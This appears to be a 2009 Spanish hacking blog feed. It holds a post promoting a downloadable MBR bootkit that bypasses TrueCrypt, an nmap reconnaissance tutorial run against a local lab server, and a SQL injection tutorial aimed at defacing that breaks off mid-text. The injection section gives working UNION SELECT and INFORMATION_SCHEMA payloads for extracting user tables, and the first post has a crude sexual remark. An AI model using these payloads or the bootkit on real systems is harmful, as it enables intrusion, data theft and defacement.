Si asi mismo es otro malware que este puede afectar Windows xp,2003, Windows Vista, y el Segurisimo Windows 7 xD....esta vez se trata de Bootkit que es un malware similar a los rootkits,este trabaja en el inicio parchando el sistema operativo para asi poder cargarse en el "Grandioso" Kernel de windows.

Tiene muy buenas funciones de las que inclusive puede saltar la encriptacion de volumen (True Crypt) No te protegera Auditores ;) ya que el MBR (Master Boot Record) esta Fijado y no encryptado,el MBR contiene un programa de desencriptacion que este mismo contiene un password que desencripta el disco y ahi viene la vulnerabilidad y de ahi nace si Maravillosamente el mismo MBR (Master Boot Record) que puede dejar tu gran windows vulnerable una vez mas...

( No me hinchen las pelotas con sus privados sobre windows)

Si quieren fotos de mi gran verga solo pidanlas amablemente XDDDDDD

Que es lo interesante de Bootkit?:

*Vulnera los ultimos windows desde Xp Hasta Windows 7 (Ironicamente el que los amantes de windows decian que era lo mas seguron jajaja si claro)

*Para Los Auditores Que Apuestan A True Crypt Para Encriptar sus volumenes Pues Malas Noticias Ahi esta Bootkit xD

*Contiene Drivers Con Soporte NTFS y FAT ^^

*Y contiene la grandiosa opcion de plugins para desarrollo en el futuro para instalar aplicaciones (es open source ^^)

===================================================================
Para los interesados en probarlo pueden Descargarlo Aqui.
El Archivo Infector AKA.

y Leer sobre el Software Aqui En Ingles :)

Analisis De Puertos,Identificacion de sistema,servicios del mismo...

noreply@blogger.com (Bryant Alston) — Wed, 29 Jul 2009 22:21:15 PDT

##################
#Author: blood_rec
#Colaborators: Georgio
#blog: http://h4xxor.blogspot.com
#web: http://e-r00t.org
#contact: blood_rec @el-hacker.org
#Musica Durante: Metallica
##################

Importancia de El
################################
# Analisis De Puertos,Identificacion de sistema,servicios del mismo...
################################
================================
A-Introduccion:

A La hora de identificar u realizar una tarea de auditoria web en un servidor muchos cometen el error o caen en la actividad que al comenzar una tarea de auditoria siempre se van con la busqueda de las vulnerabilidades primero o a usar sus SSS (Shadow Security Scanner)...

A LA hora de identificar un sistema u realizar una auditoria podemos hacer las cosas bien a nivel de servidor/cliente,y como en el sexo debemos empezar primero poco a poco o no me van a decir que a la hora de estar con una chica llegan se lo meten y ya en tan solo 3 meses la chica lo mandara al carajo xD...

pues los sistemas son asi debemos ir poco a poco para interactuar con ellos ya que con solo identificar el sistemas scannear los puertos y servicios (Deamons) que gestiona el mismo podemos hacer cosas maravillosas sin nesesidad de utilizar otras tecnicas...

a veces se les puede tornar aburrido pero de esto se trata esto mientras mas areas vas cubriendo en el tema mucho mas acto eres para llegar a tus objetivos...solo me voy a basar en teorias y algunas practicas y pruebas que realizo en mi servidor local,donde poseo algunas aplicaciones vulnerables y no vulnerables pero podemos vulnerarlas atacando sus servicios u cosas xD...

El servidor en el cual esta todo instalado es un servidor Ubuntu 8.10 Kernel Generico Apache/2.2.9 Suhosin-Patch Server con algunas aplicaciones como joomla,smf,wordpress y otro scripts programados. el servidor obviamente esta en mi red local., la maquina auditora esta con Slackware Kernel 2.6.21.5 (Una Laptop) y a la que la e convertido en una suite de pentesting...xD

B-Comienzo:

Bueno comenzaremos con Nmap O Zenmap cualquiera de los 2.ya que los comandos son practicamente lo mismo pero nos orientaremos a la primera ya que usaremos la consola en lo personal lo prefiero ya que es un poco mas rapido y de verdad que no me gusta la GUI de la misma xD para los gusto los colores y para el culo los mojones....xD pero pueden usar la que gusten...

Nmap es un scanner de puertos y servicios hasta con el mismo puedes identificar sistemas operativos de manera remota una herrmienta imprecindible para cualquier auditor,experto en seguridad,Administrador De Red,Sistema,Servidor,Lammer,Hacker,noob,geek,hasta el user normal pero es imprecindible si a estas alturas no sabes lo que es te ivito que busques en internet u entre a la pagina del autor.:

http://www.insecure.org/nmap

Sigamos Para comenzar con un scanneo Basico veremos La manera de comenzar son comandos muy faciles de aprender de memoria pero empezemos poco a poco

Voy a Probar scaneando el servidor con las reglas del firewall excluyendo a la maquina auditora a ver que sucede?:

[ go0ns @squad # nmap 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:29 GMT
All 1715 scanned ports on 192.168.56.1 are filtered
MAC Address: 00:76:62:6E:65:74 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 49.736 seconds ]

Acabamos de ver que el firewall de esa manera nos bloqueo todos los pedidos dejandonos muchos logs en el servidor auditado:

[ Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:636 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Ldaps
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:1723 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Tacacs
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:113 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Auth
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:23 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Telnet
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:53 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:DNS
Time:Jul 26 17:41:42 Direction: Unknown In:wlan0 Out: Port:80 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:HTTP
Time:Jul 26 17:41:42 Direction: Unknown In:wlan0 Out: Port:80 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Klogin ]

UFF jajaja solo son algunos de los que puede dejar ok agregamos una regla que es lo que un servidor normal pues deberia tener ya que debe dejar la entrada de las ip's pero no en todos los caso ya que las reglas aplican a algunos puertos pero excluyen a muchos pero aprenderemos como sacar el mejor provecho posible... Ahora Vamos Y Realizamos:

[ go0ns @squad # nmap 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:28 GMT
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
1241/tcp open nessus
2500/tcp open rtsserv
MAC Address:Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.743 seconds
]

Ya tenemos identificado al menos lo inicial y miremos que tenemos como pudieron ver fue un scan bien basico solo los puertos /tcp como la mayoria de los scanners en la jungla esto scans son bien agresivos y siempre son agarrados por el firewall como vimos en el primer caso terminando por banear nuestra ip si el administrador tiene buenas reglas n el firewall:
#####################
#Puerto | Servicio #
#####################
#25/tcp | smpt #
#80/tcp | http #
#110/tcp | pop3 #
#1241/tcp| nessus #
#2500/tcp| rtsserv #
#####################

Bueno analizemos tenemos 5 puertos identificados de primera instancia que se gestionan bajo el protocolo /tcp si no teneis conocimiento sobre que es el protcolo /tcp u los otros protocolos similares /udp y cosas pues no continues leyendo e instruyete desde 0 mijo...

en fin con el scaneo sencillo identificamos solo esos puertos como pudieron apreciar que el log del scan nos indica tambien que se encontraron Not shown: 1710 closed ports que estan entiendase o cerrados o filtrados Huh entonces preguntaran de como es posible si es una herramienta de scaneo de puertos y servicios pero de esto se trata de poder hacer las identificaciones especificas..

ahora queremos saber que sistema operativo tiene siempre como root asumiendo que estais en linux (igual puede hacerlo desde el otro sistema operativo) xD ok, pues realizamos

[ go0ns @squad # nmap -O 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:32 GMT
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
1241/tcp open nessus
2500/tcp open rtsserv
MAC Address: (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.60%D=6/26%OT=25%CT=1%CU=33422%PV=Y%DS=1%G=Y%M=007662%TM=4A455AA
OS:F%P=i686-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CC%TI=Z%II=I%TS=U)SEQ(SP=CD%GC
OS:D=1%ISR=CD%TI=Z%II=I%TS=U)OPS(O1=M5B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6
OS:=M5B4)WIN(W1=16D0%W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T
OS:=40%W=16D0%O=M5B4%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=N)U1(R=Y%DF=N%T=40%TOS=C0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUL
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%TOSI=S%CD=S%SI=S%DLI=S)

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.029 seconds
]

Bueno pudieron apreciar que nmap reacciono casi de la misma manera que con el 2do intento con un scaneo de puertos sencillo en los protocolos /tcp pero en este caso usamos el argumento -O para scanear el posible sistema operativo, como funciona? nmap envia cadenas especializadas a dos puertos especificos uno cerrado y uno abierto, estolo hace con el proposito de que cada sistema operativo reacciona de manera diferente a estas peticiones y como pudieron ver el scanner tubo problemas descubriendo el server que como mencione antes era ubuntu 8.10 pero igual vean los primeros resultados que se acercan a lo que queremos:

[ OS:F%P=i686-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CC%TI=Z%II=I%TS=U)SEQ(SP=CD%GC ]

Los comandos basicos de nmap los pueden ir encontrando poco a poco que tal si cambiamos un poco los comandos para que vallan haciendose una idea y familiarizandose con dicho programa y la manera que tenemos como siempre de llagar a nuestro objetivo en este caso usaremos un scaneo intensivo pero rapido que se supone que nos arroje los resultados mas imprecindibles..

[go0ns @squad # nmap -T Aggressive -A -v 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-27 01:43 GMT
Initiating ARP Ping Scan at 01:43
Scanning 192.168.56.1 [1 port]
Completed ARP Ping Scan at 01:43, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:43
Completed Parallel DNS resolution of 1 host. at 01:43, 13.00s elapsed
Initiating SYN Stealth Scan at 01:43
Scanning 192.168.56.1 [1715 ports]
Discovered open port 25/tcp on 192.168.56.1
Discovered open port 80/tcp on 192.168.56.1
Discovered open port 110/tcp on 192.168.56.1
Discovered open port 2500/tcp on 192.168.56.1
Discovered open port 1241/tcp on 192.168.56.1
Completed SYN Stealth Scan at 01:43, 0.55s elapsed (1715 total ports)
Initiating Service scan at 01:43
Scanning 5 services on 192.168.56.1
Completed Service scan at 01:43, 11.47s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.1
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 01:43
Completed SCRIPT ENGINE at 01:43, 5.05s elapsed
Host 192.168.56.1 appears to be up ... good.
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_ SMTP: HELP with errors or timeout. Enable --script-trace to see what is happening.
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch)
|_ HTML title: Index of /
110/tcp open pop3 hotwayd pop3d 0.8.4
1241/tcp open ssl/unknown
2500/tcp open smtp-proxy hotsmtpd based on hotwayd 0.8.4
MAC Address: (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.23
Uptime: 0.089 days (since Fri Jun 26 23:35:55 2009)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: go0ns.s3rver

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.036 seconds
Raw packets sent: 1735 (77.100KB) | Rcvd: 1731 (80.266KB) ]

Uff que lectura mas larga pero vamos a ver que datos contiene que nos pueden ayudar y ya se habran dado de cuenta de la gran diferencia con los resultados y el cambio de Parametros.

Veamos primero el scan y estas opciones para ver lo que relativamente es importante antes de probar este de ahora tratamos de identificar el sistema operativo lo que realizo fue adivinar el sistema operativo pero esta vez logramos de dar con el mismo mas especificamente y dar con los servicios que gestiona el mismo como los deamons miremos:

[ PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_ SMTP: HELP with errors or timeout. Enable --script-trace to see what is happening.
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch)
|_ HTML title: Index of /
110/tcp open pop3 hotwayd pop3d 0.8.4
1241/tcp open ssl/unknown
2500/tcp open smtp-proxy hotsmtpd based on hotwayd 0.8.4 ]

Como podemos ver identifica nuevamente los puertos ya mencionados asi como los servicios y la version y magicamente identifica el sistema operativo que gestiona el server :

[ Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch ]

Sonrisa y la otra parte relativamente importante es que identifica la version de los servicios aunque esto no es tan fundamental por que puede que sea un falso asi como uno correcto pero aqui es que llega la intuicion del auditor de usar la logica ya que puedes ir teoricamente buscando cual es la version real de dicho servicio con la identificacion del sistema operativo.

y que resume esto? que podemos darnos con el escenario que la aplicacion web no es vulnerable pero si los servicios o deamons del mismo y podemos vulnerarla por ahi xD ELEMENTAL NO?

por eso es que es bien importante los scaneos de identificacion por que de muchas maneras puedes encontrar las vulnerabilidades si no lo son a nivel web son a nivel server pero siempre encontraras algo.Sigamos

[ OS details: Linux 2.6.13 - 2.6.23 ]

Nos indica mas o menos el kernel que corre bajo el sistema operativo pero no siempre se da este caso del mismo las mayoria de las veces lo atina..

otra de las herramientas que podemos encontrar por la jungla de la web es xprobe2 para la identificacion de sistemas operativos veamos:

[ go0ns.squad # xprobe2 -v 192.168.56.1

* Primary guess:
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.22" (Guess probability: 100%)
* Other guesses:
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.23" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.21" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.20" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.19" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.24" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.25" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.26" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.27" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.28" (Guess probability: 100%)
* Cleaning up scan engine
* Modules deinitialized
* Execution completed ]

casi igual como nmap lo unico que este tiene tareas mas especificas en la identificacion de sistemas operativos y nos arroja el mismo resultado que muchas veces pued confundir pero a medida que vallan perfeccionando las tecnicas dan con los mismos.

Otra herramienta que nos puede ayudar en la identificacion de sistemas y objetivos de la informacion del mismo es Maltego que se puede descargar desde Paterva.com con la que pueden sacar emails,directorios,archivos,dominios,sub dominios y otras cosas del servidor identificado.

entonces que es lo que quiero adentrar y detallar mas aqui solo queria explicarles que para identificar vulnerabilidades en un servidor no tienes primero que comenzar por la aplicacion web nesesariamente con tan solo con la identificacion misma del sistema puedes abrir muchas posibilidades a descubrir muchas mas cosas que solo las vulnerabilidades que tiene la web o el servidor...

si ya saben que pueden encontrar una aplicacion web en un servidor que no sea vulnerable que buscas por lados y no encuentras nadas pero se te olvido buscar los servicios que tiene el server pero cuando scaneas encuentras que tiene varios deamons que son vulnerables como el mencionado arriba que gestiona el correo postfix donde corre el servicio smpt y supongamos que ese servicio contiene un deamon que sea vulnerable a un buffer overflow o (desbordamiento) como quieran decirle entonces BINGO !!! haz encontrado algo al menos en mi servidor local solo hay muy ocos servicios gestionandose.

pero siempre alla fuera en la jungla encontrarn muchicimo mas como servicios de mysql,mssql,u otras cosas interesantes..

entonces siempre recuerden que la identificacion de sistemas es lo primero que debemos hacer a la hora de buscar vulnerabilidades en una web por que puedes llegar a encontrar puertas abiertas sin tener que registrar la aplicacion web y no te imaginas las posibilidades que hay dentro del mismo..

si si te preguntas SE PUEDE USAR NMAP PARA BUSCAR VULNERABILIDADES? no y si por que no te identificara las vulnes de primera instancia pero realiza algunas cadenas de reglas como metodos de scan que te audarian a identificar servicios sin actualizacion vulnerables a algunos ataques..

espero que esta breve explicacion sobre la importancia de la identificacion y puertos de un sistema les haya gustado ya Breve Pasamos al proximo Paper y Aqui les dejo una listita de algunas herramientas que te ayudarian en este renglon:
nmap
Zenmap
Amap
Maltego
httprint
unicornscan
xprobe

son herramientas con usos similares pero les pueden acomodar tareas especificas para sacarle provecho...

Greetz: JosS,alevsk,ANTRAX,h4n0wars,e-r00t.org,security-shell members,Darvein,y mis hijos por crecer tan rapido carajo xD..

###########
#blood_rec#
###########

para leer el papel mas completo:
Link
Link

Cubriendo Y Aplicando Teorias De Inyecion Sql

noreply@blogger.com (Bryant Alston) — Wed, 29 Jul 2009 20:14:04 PDT

###################################
#Author: blood_rec #
#Colaborators: Georgio #
#blog: http://h4xxor.blogspot.com #
#web: http://e-r00t.org #
#contact: blood_rec @el-hacker.org #
###################################

##################################
# Cubriendo Y Aplicando Teorias De Inyecion Sql
##################################
==================================
A-Introduccion:

Este Paper pretende cubrir 2 areas Teoria Y Practica si no te gusta leer mucho simplemente Erase (borra) el paper con este paper pretendemos cubrir todo lo referente recopilando info y con los conocimientos limitados que tenemos queremos simplemente dar una guia referente al tema es como el Paper de "Defacing De La Manera Correcta" pero esta vez con practicas y lectura para entretener al usuario que quiere adentrarse en el tema del defacing.

es imprecindible que no traten de saltar ninguna area ya que pretendemos cubrir lo mas extenso posible para que tenga un buen enfasis de lo que realizan y el escenario que enfrentaremos alla afuera en la web

ya e escribido varias veces sobre las vulnerabilidades webs y ciertamente cada vez que pasan los dias la tecnologia y la web se va moviendo a pasos Agigantados hasta el punto que se a vuelto en el medio publicitario mas grande de estos dias.

pero a medida que nos movemos muchos quieren convertirse en desarrolladores de aplicaciones asi como webmasters u administradores de servidores webs,la competencia es amplia y asi como es amplia las vulnerabilidades aumentan asi como las viejas (vulnerabilidades) siguen haciendo presencia en nuestros scripts (me incluyo) por que estamos sujetos a cometer errores con nuestras aplicaciones.

ya los que me conocen saben que soy bien teorico en este tema y me gusta abarcar el medio Pero Por que lo hago? el conocimiento del hombre esta bajo unas letras y mientras mas entendamos el tema podemos aplicar todo lo que se explica dentro de el.

En este paper estaremos cubriendo las areas mencionadas en el menu arriba y asumimos que la practica la llevaras a cabo en tu servidor local L.A.M.P <> W.A.M.P, sea el escenario en una red LAN de tu propiedad o el escenario ya mencionado pero asumimos que todo es con motivo educacional y proponiendo los problemas ya mencionados en el tema.

asumimos que si estas leyendo este paper tienes conocimientos basicos de php si no es asi puedes pasar por http://php.net y ahi podras encontrar mucha info al respecto, asi como puedes encontrar informacion en http://google.com = search - php manuales xD. y pases por el buscador a buscar referencias sobre lo que no entiendan asi como los otros lenguajes al menos conocimientos basicos como en perl,html,javascript etc pero al menos lo basico...

Segun Wikipedia:
SQL Injection es una vulnerabilidad en el nivel de la validación de las entradas a la base de datos de una aplicación. Una inyección SQL sucede cuando se inserta o “inyecta” un código SQL “invasor” dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el
código “invasor en la base de datos.

bueno a lo que vivnimos...
#####################################
B-Inyecciones SQL (SQL Injections):

Primero asumo que llegastes a este manual por que quieres aprender como se realiza este ataque y muchas veces debes haber leido esta explicacion pero muchos que empieza este tema pues aun no se enteran de que se trata esto y que significa pues como lectura obligatoria pongo su significado.

Inyeccion Sql Es cuando un comando SQL que es un lenguaje de gestion de datos es ejecutado con las intenciones de obtener data de una base de datos,en palabras mas tecnicas estamos haciendo una consulta arbitraria de un comando peviamente establecido., y de esa manera manipulamos la aplicacion que queremos.

No es algo muy avanzado ni muy nuevo en nuestro mundo under y realmente se pregunta constantemente pero que herramientas debo usar para hacer inyecciones sql's ?

realmente no nesesitas muchas tools con solo firefox bastara xD http://mozzila.org/firefox ,...

explotar validaciones de aplicaciones que se gestiones por base de datos mysql son el escenario que realmente perseguimos o un ejemplo de probar dicha vulnerabilidad,...

Obviamente no puedo llenarlos de letras explicando todo esto todo el dia por que igual me criticarian y a mi me facina escribir pero en fin vallamos mas adelante:

1-Detectando La Vulnerabilidad:
Bueno lo primero que nesesitaremos es obviamente la curiosidad y la malicia pongamos el escenario asi; entramos en una pagina dinamica en php y nos pide una autentificacion., obviamente no la tenemos y tendremos que registrarnos interactuando con una forma en php que asi mismo ella interactua con una base de datos para incluir el usuario.

ok para saber como interactuan ambas sabmos que cuando registras un usuario en una forma y queda registrado en la base de datos quedan guardados en una tabla o en muchas de ellas seria en la tabla de miembros y el usuario asi como el password quedan guardados en diferentes columnas., detente si no tienes idea de esto es hora que te pases por http://wikipedia.org/SQL .

Cuanod te logeas en la forma la aplicacion busca la DATA del usuario en la tabla del usuario que proporcionastes asi como el password, asi la aplicacion despues de encontrar el usuario y contrasena que suplistes te dejara logearte en dicha aplicacion., si se diera el caso que los datos son icorrectos pues la aplicacion te lo informara que los datos son icorrectos o el usuario que proporcionaste no existe etc., ya a de haberle pasado alguna vez..

SQL puede darte estos datos en pantalla tambien y mostrar la informacion dentro de una palicacion web., eso en el ejemplo de las formas de logeo asi como si la aplicacion tiene una seccion de posteo de links pues tendra una tabla en la base de datos que guarda y gestiona los links publicados, lo mismo para noticias, una tabla que guardara los nombres de las noticias, en este caso la mayoria de las veces estas noticias u cosas,artculos se identifican la mayoria de las veces en las tablas por un numero.

como nos damos de cuenta cual es ese numero si miramos la url del sitio que estamos probando dira o sera asi

---> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=69 ]

la url le dice al sitio ue mire la tabla que tiene el nombre del articulo que es :

[ ArticuloID que es "69" ]

Una vez que el sitio busca la tabla del "ArticuloID" que se Busca la misma linea que se llama "Titulo" Dentro de la columna y la muestra en tu navegador.

En este otro caso veremos "lammer" como titulo de nuestro Articulo, recuerden que es bien importante ver que esta escrito despues de '=' que es parte de un comando SQL siempre tengamos eso en mente:
####################
#Articulo_Id#Titulo#
#===========#======#
#69 #lammer#
#70 #kiddie#
#71 #noob #
####################

OK y entonces que es lo que debemos hacer ya que tenemos nuestra victima? ok ejecutaremos comandos manualmente a ver si nuestra aplicacion es vulnerable,realizando nuestras consultas via navegador (firefox) xD, ejecutaremos ese comando siempre despues de '=' si es el caso que queremos inyectar en la forma que nos muestra los articulos,etc., si es el caso que es una forma de autentificacion sease usuario + password pues los comandos los ejecutaremos en los campos mencionados. como una barra de busqueda una barra de usuario o password.

si es vulnerable siempre el sitio hara lo que le digas que haga solo manipulando las consultas SQL xD

Es muy importante siempre leer y aprender sobre lo que estas haciendo aprender los comandos y todo aplicarlo a full ya que de esa manera la practica te hara un maestro. Memorizarte poco a poco te hara bien y entonces nos familiarizamos con algunos comandos SQL:

#######################
Comando ## Uso #
=======================
ORDER BY Le Ordena Al sitio que nos muestre la columna en la misma pagina que estamos visualizando#
OR El Comando se usa si una sentencia es verdadera dentro de la consulta SQL #
+ Se Usa En Vez De Usar Espacio Lease,Entiendase la tecla de Espacio [Space] #
-- Termina Una sentencia de comandos SQL asi como lasm ';' en perl etc #
AND Ambas consultas tienen que ser verdaderas dentro de la base de datos Para ser llevada #
UPDATE Cambia la informacion dentro de una Columna O Una Tabla #
SELECT Especifica Informacion En una Tabla #
##################################

La manera mas sencilla de aplicar una inyeccion sql,es burlando autentificaciones,que son nada mas o menos que las autentificaciones de usuario y password:

pero en este caso probaremos con una consulta bien elemental dentro del mundo de las inyecciones sql y es con tan simple el uso de (') comilla , sabemos que en la forma el usuario y el password esta rodeado de comillas simples "'" entonces si sometemos a la forma una simple comilla te arrojara un error dado que hay 2 "'" (comillas) invisbles en la forma si sometemos a' te arrojara el error comun cuando hay un error de consulta SQL en el servidor obviamente nos daremos cuenta pero que realmente esta pasando detras de nostros ?:

cuando sometimos ' el servidor envio una consulta a la base de datos para interpretar ' que en los campos mencionados arriba estan rodeados de ellas 'usuario' seria el ejemplo al servidor no encontrar nada en la base de datos que consulte ese comando ni en las tablas ni en las lineas ni en las columnas por ende es un error del programador (entiendase) una vulnerabilidad aunque no en todos los casos.

siempre dentro de una base de datos tenemos el INFORMATION_SCHEMA que guarda cada nombre de las tablas y de las columnas de un sitio en siempre un servidor tendra el INFORMATION_SCHEMA como dato obvio su nombre nunca cambiara las tablas dentro de INFORMATION_SCHEMA que guarda los nombres de las otras tablas tendran una tabla dentro que se llamara INFORMATION_SCHEMA.TABLES el nombre de la columna que guarda la informacion que practicamente queremos se llama a su vez table_name la tabla que guarda el nombre de las otras columnas dentro de INFORMATION_SCHEMA se llama INFORMATION_SCHEMA.COLUMNS y sucesivamente la columna que guarda la informacion que queremos de esta parte se llama column_name recuerden que esto es dentro de INFORMATION_SCHEMA.COLUMNS., ya se les esta haciendo claro no?. xD

como explique antes podemos siempre encontrar la caracteristica que el sitio web que gestiona la base de datos siempre tiene "=" en su URL por ende que para ejecutar los comandos tenemos que hacerlo luego de "=" ok simplemente prueba con los comandos o consultas despues de...

ok vamos a nuestro escenario imaginario:

estamos navegando y nos encontramos nuevamente con la web:

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10 ]

ok vamos a determinar si es vulnerable

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+AND+1=0-- ]

bueno aqui lo que paso fue lo siguiente es que se supone que se muestre el articulo 10 solo se mostrara si 1 es igual que 0, en este caso "AND" significa que para que el articulo 10 se muestre en el sitio debe existir (en la base de datos) "AND" 1 debe ser igual que 0, esto ocacionara que no se muestre el articulo ya que 1 no es igual que 0 .

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+AND+1=1-- ]

se muestra el articulo 10 si el 1 es igual que el 1 .,el articulo se mostrara en la pagina ya que "AND" 1 es igual que 1 .,Ahoea sabemos que la aplicacion es vulnerable ya que se muestra cuando queremos y no lo haces cuando queremos xD., es hora de continuar con nuestro ataque ;-)
Ahora queremos encontrar las columnas de nuestro sitio:

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+ORDER+BY+1-- ]

"ORDER BY 1" donde esta "1" es el numero de la columna lo que hace es mostrarnos la primera columna en la pagina.,"ORDER BY 2" nos mostrara la 2 columna en la pagina., sucesivamente vamos aunmentando los valores del numero sumandole (+) uno hasta que nos muestre un error en la pagina y entonces cuando nos muestra el error la restamos uno de los numeros que pusimos y no te olvides de ese numero por ejemplo si sumastes numeros y te dio el error cuando pusistes hasta 6 entonces seria asi:

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+ORDER+BY+5-- ]

bueno ya sabemos que tiene 5 columnas la aplicacion., ahora queremos conseguir el nombre de las tablas que ya arriba habiamos mencionado este comando pues eso lo haremos de esta manera:

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,4,5+FROM+INFORMATION_SCHEMA.TABLES-- ]

OK expliquemos esa sentencia SELECT Le indica al sitio que muestre la informacion de la tabla que usted especifica.,en este caso acabamos remplazando el numero del articulo que era 69 por un caracter negativo "-".,recordemos tambien que en pasos anteriores para buscar la columna ibamos sumandole numeros y agregandolos a la url pues en este caso los vamos poniendo uno al lado del otro separados de una coma "," (1,2,3,4,5).

Se supone que a estas alturas uno de esos numeros que pusistes en la consulta de la URL al menos uno se muestre en el website (pantalla).

ahora lo que iremos es remplazando los numeros en la URL por palabras si se van mostrando en la pantalla..

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_tabla,5+FROM+INFORMATION_SCHEMA.TABLES-- ]

Recuerden que deben remplazar un al menos uno de los numeros con "nombre_tabla" que es el nombre de la tabla.,FROM+INFORMATION_SCHEMA.TABLES recuerden tambien que esto te mostrara el nombre de la tabla que ya eso lo explicamos arriba.,el nombre de la tabla numero 4 que fue la que remplazamos se mostrara en la pantalla.,...

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_tabla,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+nombre_tabla>'displayed_table'-- ]

Estamos seguros que "nombre_tabla" no es la que buscamos y la que queremos es la que tiene los usuarios y los passwords.,para navegar una lista de tablas y encontrar la tabla correcta agregamos:

[+WHERE+nombre_tabla>'displayed_table']

Displayed_table muestra la tabla incorrecta despues de TABLES por ende este comando displayed_table nos muestra la tabla siguiente despues de.,entonces lo que hacemos es que repetimos el paso anterior hasta que nos muestre una tabla deseada que en este caso la que queremos es la que contenga los usuarios.,ya cuando la consigas no olvides el nombre de la tabla que querias.,

Ahora queremos sacar nuestra columna o nombre de la columna:

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_columna,5+FROM+INFORMATION_S
CHEMA.COLUMNS+WHERE+nombre_tabla='CuentasUsuarios'-- ]

